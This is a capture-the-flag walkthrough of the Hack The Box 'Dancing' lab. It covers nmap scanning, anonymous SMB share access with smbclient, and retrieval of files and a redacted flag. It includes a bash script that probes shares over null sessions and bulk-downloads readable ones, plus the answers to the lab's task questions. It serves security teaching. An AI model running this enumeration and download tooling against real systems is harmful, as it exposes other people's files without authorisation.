#3 Dancing - Starting Point - Hack The Box || Complete detailed Walkthrough

There are multiple ways to transfer a file between two hosts on the same network. One of these protocols is studied in this example, and that is SMB (Server Message Block). This communication protocol provides shared access to files, printers, and serial ports between endpoints on a network. We mostly see SMB services running on Windows machines.

During scanning, we will typically see TCP port 445 open on the target, the port reserved for SMB. SMB is an application-layer protocol, so it relies on a lower-level protocol for transport. Modern Windows hosts run SMB directly over TCP on port 445, while the older encapsulation, NetBIOS over TCP/IP (NBT), uses port 139. This is why a scan of a Windows host usually shows both ports open, as we will see during the enumeration phase of this write-up.

Using the SMB protocol, an application (or the user of an application) can access files at a remote server, along with other resources such as printers. Thus, a client application can read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.


Although access to a share can be locked down properly, administrators sometimes make mistakes and accidentally allow logins without any valid credentials, whether through guest accounts or anonymous (null) sessions. We will witness this in the following sections.


Enumeration

First, we have to start the target by clicking “Spawn Machine”. The IP address of Dancing is then shown on the screen.


We start, as always, by scanning the target once we are connected to the VPN. The following command makes Nmap probe the 1000 most common TCP ports and display the service version for each one that is open (to cover all 65535 ports you would add -p-, which takes considerably longer).

┌──(mrdev㉿mrdev)-[~]
└─$ sudo nmap -sV 10.129.136.156
[sudo] password for mrdev:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 23:18 IST
Nmap scan report for 10.129.136.156
Host is up (0.79s latency)
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.26 seconds

As previously mentioned, we observe that port 445/TCP for SMB is open, which means the host is offering SMB and may have shares that we could explore.

Think of a share as a folder that can be accessed over the network. To interact with it we need an SMB client installed on our system. On Linux, the tool for enumerating and connecting to shares on a remote system is smbclient, part of the Samba suite.

If it is not present on your machine, you can install it with the following command:

┌──(mrdev㉿mrdev)-[~] 
└─$  sudo apt-get install smbclient -y

Our next step is to enumerate the shares offered by our target. Before that, let us look at the capabilities and usage of smbclient through its help output:

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient --help
Usage: smbclient service <password>
-R, --name-resolve=NAME-RESOLVE-ORDER      Use these name resolution services only
-M, --message=HOST                         Send message
-I, --ip-address=IP                        Use this IP to connect to
-E, --stderr                               Write messages to stderr instead of stdout
-L, --list=HOST                            Get a list of shares available on a host                                       
-m, --max-protocol=LEVEL                   Set the max protocol level                                                    
-T, --tar=<c|x>IXFvgbNan                   Command line tar
-D, --directory=DIR                        Start from directory
-c, --command=STRING                       Execute semicolon separated commands                                          
-b, --send-buffer=BYTES                    Changes the transmit/send buffer                                              
-t, --timeout=SECONDS                      Changes the per-operation timeout                                             
-p, --port=PORT                            Port to connect to
-g, --grepable                             Produce grepable output
-q, --quiet                                Suppress help message
-B, --browse                               Browse SMB servers using DNS

Help options:
-?, --help                                Show this help message
    --usage                               Display brief usage message

Common samba options:
-d, --debuglevel=DEBUGLEVEL               Set debug level
-s, --configfile=CONFIGFILE               Use alternate configuration file
-l, --log-basename=LOGFILEBASE            Base name for log files
-V, --version                             Print version
    --option=name=value                   Set smb.conf option from command line
 
Connection options:
-O, --socket-options=SOCKETOPTIONS        socket options to use
-n, --netbiosname=NETBIOSNAME             Primary netbios name
-W, --workgroup=WORKGROUP                 Set the workgroup name
-i, --scope=SCOPE                         Use this Netbios scope
 
Authentication options:
-U, --user=USERNAME                       Set the network username
-N, --no-pass                             Don't ask for a password
-k, --kerberos                            Use kerberos (active directory) authentication
-A, --authentication-file=FILE            Get the credentials from a file
-S, --signing=on|off|required             Set the client signing state
-P, --machine-pass                        Use stored machine account password
-e, --encrypt                             Encrypt SMB transport
-C, --use-ccache                          Use the winbind ccache for authentication
    --pw-nt-hash                          The supplied password is the NT hash

Here, we are going to use -L, which asks the given host for the list of shares it offers.

Let us clear the screen and run the command that requests the share list from the server:

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -L 10.129.136.156

smbclient will attempt to connect to the remote host and, unless told otherwise with -N, will prompt for a password to go with the username it is about to send.

┌──(mrdev㉿mrdev)-[~]
└─$  smbclient -L 10.129.136.156
Enter WORKGROUP\mrdev's password:

We should take note of this. If we do not specify a username to smbclient with -U, it uses the username we are currently logged into our own machine with, prefixed with the default workgroup. Here that is “WORKGROUP\mrdev”.

This is because an SMB session setup always carries a username, so when we do not give one explicitly, smbclient falls back to our local username rather than failing.

Nevertheless, let us use our local username since we do not know about any remote usernames present on the target host that we could potentially log in with.

Next up, after that, we will be prompted for a password. This password is related to the username you input before. Hypothetically, if we were a legitimate remote user trying to log in to their resource, we would know our username and password, and log in normally to access our share. In this case, we do not have such credentials, so we will be trying to perform either Guest authentication or Anonymous authentication.



Either of these will let us log in without a valid username and password combination and see the files stored on the share. Let us try.

We leave the password field blank and simply hit Enter, which sends an empty password.

┌──(mrdev㉿mrdev)-[~]
└─$  smbclient -L 10.129.136.156
Enter WORKGROUP\mrdev's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
WorkShares      Disk

SMB1 disabled -- no workgroup available
┌──(mrdev㉿mrdev)-[~]
└─$ 

Four separate shares are displayed. Let us go through each of them and see what they mean.

  • ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that give system administrators remote access to every disk volume on a network-connected system. ADMIN$ itself maps to the Windows installation directory (%SystemRoot%). These shares cannot be permanently deleted, but they can be disabled.
  • C$ - Administrative share for the C:\ disk volume. This is where the operating system is hosted.
  • IPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.
  • WorkShares - Custom share.

The trailing $ marks a hidden share: it is not displayed when browsing the host's shared folders, although it can still be connected to by name, as we are about to do.

Foothold

We will try to connect to each of the shares one by one. We will use the same tactic as before, attempting to log in without the proper credentials to find improperly configured permissions on any of these shares. First, let us try the ADMIN$ one using smbclient.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient \\\\10.129.136.156\\ADMIN$
Enter WORKGROUP\mrdev's password:
tree connect failed: NT_STATUS_ACCESS_DENIED

The “NT_STATUS_ACCESS_DENIED” is output, letting us know that we do not have the proper credentials to connect to this share. We will follow up with the C$ administrative share and we will find the same Access Denied.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient \\\\10.129.136.156\\C$
Enter WORKGROUP\mrdev's password:
tree connect failed: NT_STATUS_ACCESS_DENIED

IPC$, on the other hand, does accept our connection. It is not a file share, though: it only exposes named pipes, so a directory listing fails and there are no files to download. The fact that a null session is accepted on IPC$ is still worth noting, since it is what tools such as rpcclient and enum4linux use to query a host over RPC, but we do not need that for this box.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient \\\\10.129.136.156\\IPC$
Enter WORKGROUP\mrdev's password:
smb: \> ls
NT_STATUS_INVALID_INFO_CLASS listing \*
smb: \> 

Last chance. We proceed to the custom WorkShares share. It is human-made rather than a Windows default, and therefore the most likely to be misconfigured.

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient \\\\10.129.136.156\\WorkShares
Enter WORKGROUP\mrdev's password:
Try "help" to get a list of possible commands.
smb: \>

Success! The WorkShares SMB share was poorly configured, allowing us to log in without the appropriate credentials. We can see our terminal prompt changed to smb, letting us know that our shell is now interacting with the service.

We can use the help command to see what we can do within this shell.

smb: \> help
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            deltree        dir
du             echo           exit           get            getfacl
geteas         hardlink       help           history        iosize
lcd            link           lock           lowercase      ls
l              mask           md             mget           mkdir
more           mput           newer          notify         open
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir
posix_unlink   posix_whoami   print          prompt         put 
pwd            q              queue          quit           readlink
rd             recurse        reget          rename         reput
rm             rmdir          showacls       setea          setmode
scopy          stat           symlink        tar            tarmode
timeout        translate      unlock         volume         vuid
wdel           logon          listconnect    showconnect    tcon
tdis           tid            utimes         logoff         ..
!
smb: \>

From the output, we can notice that most of the commands we are used to in Linux are present. We will be using the following to navigate the share: 
  • ls    : listing contents of the directories within the share 
  • cd   : changing current directories within the share 
  • get   : downloading a file from the share to our local machine 
  • exit : exiting the smb shell 

Typing in the ls command will show us two directories, one for Amy.J and one for James.P . We visit the first one and are met with a file called worknotes.txt, which we can download using the get command.

smb: \> ls
.                                   D        0  Mon Mar 29 13:52:01 2021
..                                  D        0  Mon Mar 29 13:52:01 2021
Amy.J                               D        0  Mon Mar 29 14:38:24 2021
James.P                              D        0  Thu Jun  3 14:08:03 2021
5114111 blocks of size 4096. 1733761 blocks available



smb: \> cd Amy.J\

smb: \Amy.J\> ls
.                                   D        0  Mon Mar 29 14:38:24 2021
..                                  D        0  Mon Mar 29 14:38:24 2021
worknotes.txt                        A       94  Fri Mar 26 16:30:37 2021
5114111 blocks of size 4096. 1733488 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

This file is now saved in the directory we ran smbclient from. Let us continue looking for other valuable files in the James.P directory, where we find flag.txt. After retrieving it, we use the exit command (or Ctrl+C) to quit the SMB shell and check the files we just retrieved.

smb: \Amy.J\> cd ..     #To go back to the previous directory
smb: \> ls

.                                   D        0  Mon Mar 29 13:52:01 2021
..                                  D        0  Mon Mar 29 13:52:01 2021
Amy.J                               D        0  Mon Mar 29 14:38:24 2021
James.P                              D        0  Thu Jun  3 14:08:03 2021
5114111 blocks of size 4096. 1733484 blocks available

smb: \> cd James.P\
smb: \James.P\> ls
.                                   D        0  Thu Jun  3 14:08:03 2021
..                                  D        0  Thu Jun  3 14:08:03 2021
flag.txt                            A       32  Mon Mar 29 14:56:57 2021
5114111 blocks of size 4096. 1733484 blocks available

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)  
smb: \James.P\> exit
┌──(mrdev㉿mrdev)-[~]
└─$ 
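The share-by-share probing above and the manual ls/cd/get walk through WorkShares can be scripted. The following bash script is an added example, not part of the original write-up or of Hack The Box's material. It lists the shares a host exposes to a null session with smbclient -N -g -L, attempts an anonymous connect-and-ls on each one, classifies the outcome using the NT_STATUS strings that smbclient printed in this write-up, and recursively downloads any share that turns out to be readable. The sample listing embedded in it is constructed to mirror the shares found on Dancing; the loot/ output directory and the verdict words are my own choices.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): enumerate the shares a
# host exposes to a null session, probe each one for anonymous access, and
# pull down everything readable, non-interactively. Requires smbclient.
set -u

# Constructed sample of `smbclient -N -g -L <host>` output, mirroring the
# shares seen on Dancing. Used for the offline demo; not captured live.
SAMPLE_LISTING='Disk|ADMIN$|Remote Admin
Disk|C$|Default share
IPC|IPC$|Remote IPC
Disk|WorkShares|
SMB1 disabled -- no workgroup available'

# parse_shares: read a grepable (-g) share listing on stdin and print one
# share name per line. -g emits TYPE|NAME|COMMENT, so names containing
# spaces survive, which a whitespace split of the default table would not.
# Server and Workgroup lines, and status messages, are filtered out by type.
parse_shares() {
  awk -F'|' 'NF >= 2 && $1 ~ /^(Disk|IPC|Printer)$/ { print $2 }'
}

# classify_probe: reduce the text smbclient prints for a null-session
# "connect and ls" attempt to one word. The status strings are the ones seen
# in this write-up; any other NT_STATUS code falls through to UNKNOWN.
classify_probe() {
  case "$1" in
    *NT_STATUS_ACCESS_DENIED*|*NT_STATUS_LOGON_FAILURE*) echo DENIED ;;
    *NT_STATUS_INVALID_INFO_CLASS*) echo CONNECTED ;;  # tree connect ok, but no file system (IPC$)
    *"blocks of size"*)             echo READABLE ;;   # ls succeeded: listing footer was printed
    *)                              echo UNKNOWN ;;
  esac
}

# probe_share HOST SHARE: null-session tree connect plus a root listing.
# -N sends an empty password instead of prompting; -c runs commands and exits.
probe_share() {
  local host=$1 share=$2 out
  out=$(smbclient -N "//$host/$share" -c 'ls' 2>&1)
  classify_probe "$out"
}

# dump_share HOST SHARE DEST: recursively download a readable share into
# DEST, with the per-file confirmation that interactive mget would ask for
# switched off.
dump_share() {
  local host=$1 share=$2 dest=$3
  mkdir -p "$dest"
  smbclient -N "//$host/$share" -c "lcd \"$dest\"; recurse ON; prompt OFF; mget *"
}

main() {
  local host=$1 share verdict
  echo "[*] Null-session share probe against $host"
  smbclient -N -g -L "$host" 2>/dev/null | parse_shares | while IFS= read -r share; do
    verdict=$(probe_share "$host" "$share")
    printf '  %-20s %s\n' "$share" "$verdict"
    if [ "$verdict" = READABLE ]; then
      dump_share "$host" "$share" "loot/$host/$share"
    fi
  done
}

if [ $# -ge 1 ]; then
  main "$1"
else
  echo "usage: $0 <target-ip>  (no target given; parsing the built-in sample listing instead)"
  printf '%s\n' "$SAMPLE_LISTING" | parse_shares
fi
```

Run it as ./smb_null_probe.sh 10.129.136.156 against a live target; without an argument it only parses the built-in sample. Keep in mind that every probe, including the denied ones against ADMIN$ and C$, produces authentication and share-access events on the target, so this is noisy by design.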

Once we have left the SMB shell, we can read the two files we downloaded. worknotes.txt hints at further services that could be targeted. Files like this are typically left lying around on machines in a multi-machine Hack The Box lab, pointing at your next target or serving as a resource for further exploitation or lateral movement. In our case it is just a proof of concept, and we will not need it.

┌──(mrdev㉿mrdev)-[~]
└─$ ls
worknotes.txt  flag.txt
┌──(mrdev㉿mrdev)-[~]
└─$ cat worknotes.txt
- start apache server on linux machine
- secure the ftp server
- setup winrm on dancing
┌──(mrdev㉿mrdev)-[~]
└─$ cat flag.txt
5f61**************************64

Now submit the flag to own the Dancing machine. To complete the Starting Point entry, you also have to answer the following questions.


Task Solution/Answer


TASK 1: What does the 3-letter acronym SMB stand for?

Ans. Server Message Block

TASK 2: What port does SMB use to operate at?

Ans. 445

TASK 3: What network communication model does SMB use, architecturally speaking?

Ans. client-server model

TASK 4: What is the service name for port 445 that came up in our nmap scan?

Ans. microsoft-ds

TASK 5: What is the tool we use to connect to SMB shares from our Linux distribution?

Ans. smbclient

TASK 6: What is the `flag` or `switch` we can use with the SMB tool to `list` the contents of the share?

Ans. -L

TASK 7: What is the name of the share we are able to access in the end?

Ans. WorkShares

TASK 8:  What is the command we can use within the SMB shell to download the files we find?

Ans. get

